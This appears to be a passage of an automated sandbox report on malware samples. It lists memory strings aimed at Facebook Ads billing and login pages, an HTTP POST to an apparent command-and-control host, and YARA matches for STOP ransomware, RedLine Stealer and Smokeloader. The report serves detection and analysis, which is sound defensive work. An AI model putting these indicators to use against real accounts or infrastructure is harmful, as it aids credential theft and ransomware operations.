Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: e</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: elwww.facebook.comnal equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: fcebhttps://www.facebook.com/AAAAAAIAAA}Q equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: fwww.facebook.com f` equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hp?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing_used,form_data,display_name,icon_url,federation_url,skip_z equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://www.facebook. equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/XQc equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647490629.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.530168385.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingCookiesW equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingN equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingO equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingnPxT equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingndex_meta_1 equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingnf equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingp equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billings equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingsz equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billinguDX equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing| equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing$, equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing^ equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingc equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/u5 equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing$y equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingD equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.625617363.00000000005DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingw.facebo7) equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">T equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script> equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: p *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: p.Rwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espa equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: uscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: uscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3Phttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-Type0Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:17 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: word" class="inputtext _55r1 inputtext _9npi inputtext _9npi" name="pass" id="pass" tabindex="0" placeholder="Password" value="" autocomplete="current-password" aria-label="Password" /><div class="_9ls7" id="u_0_4_+a"><a href="#" role="button"><div class="_9lsa"><div class="_9lsb" id="u_0_5_7R"></div></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a href="https://www.facebook.com/recover/initiate/?ars=facebook_login" class="_97w4" target="">Forgot account?</a><span role="presentation" aria-hidden="true"> equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647838153.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.570583469.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534210487.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647490629.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569867418.0000000000868000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.560741420.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.558357025.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com, equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.534210487.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com4k equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com<O equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com@ F equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comGER equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comGER+ equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comGER= equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comP equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com[3O equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com^i# equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.come equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: y5gLo05www.facebook.comGyfg23OMn2qknLZ equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: }Twww.facebook.com equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxgxe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: furubujjul.net
Source: unknown HTTPS traffic detected: 172.67.144.83:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.23.58.153:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49745 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: F4FD.exe, 00000006.00000002.521322299.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match File source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTR

System Summary

Source: 9.0.ECFD.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.624566316.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000000.533159957.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.522204411.00000000007C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000000.529399844.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
